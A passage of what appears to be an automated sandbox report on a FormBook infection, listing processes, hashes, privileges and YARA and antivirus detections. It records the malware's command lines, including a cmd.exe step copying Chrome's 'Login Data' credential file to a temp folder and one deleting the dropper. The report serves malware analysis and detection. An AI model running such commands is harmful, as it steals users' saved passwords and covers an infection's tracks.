                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 33%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: systray.exe PID: 3652 Parent PID: 3388

                                            General

                                            Start time:21:11:53
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\systray.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\systray.exe
                                            Imagebase:0xc90000
                                            File size:9728 bytes
                                            MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            Analysis Process: cmd.exe PID: 6180 Parent PID: 3652

                                            General

                                            Start time:21:11:58
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\orden pdf.exe'
                                            Imagebase:0xbb0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: conhost.exe PID: 6192 Parent PID: 6180

                                            General

                                            Start time:21:11:58
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: cmd.exe PID: 2412 Parent PID: 3652

                                            General

                                            Start time:21:12:48
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                                            Imagebase:0xbb0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: conhost.exe PID: 1720 Parent PID: 2412

                                            General

                                            Start time:21:12:48
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: cx9l_rq2dula.exe PID: 5296 Parent PID: 3388

                                            General

                                            Start time:21:13:02
                                            Start date:13/01/2021
                                            Path:C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
                                            Imagebase:0x13b0000
                                            File size:1550336 bytes
                                            MD5 hash:4F1AD14256CC9C420D78D69B468BAB48
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 33%, ReversingLabs
                                            Reputation:low

                                            Disassembly

                                            Code Analysis

                                            Reset < >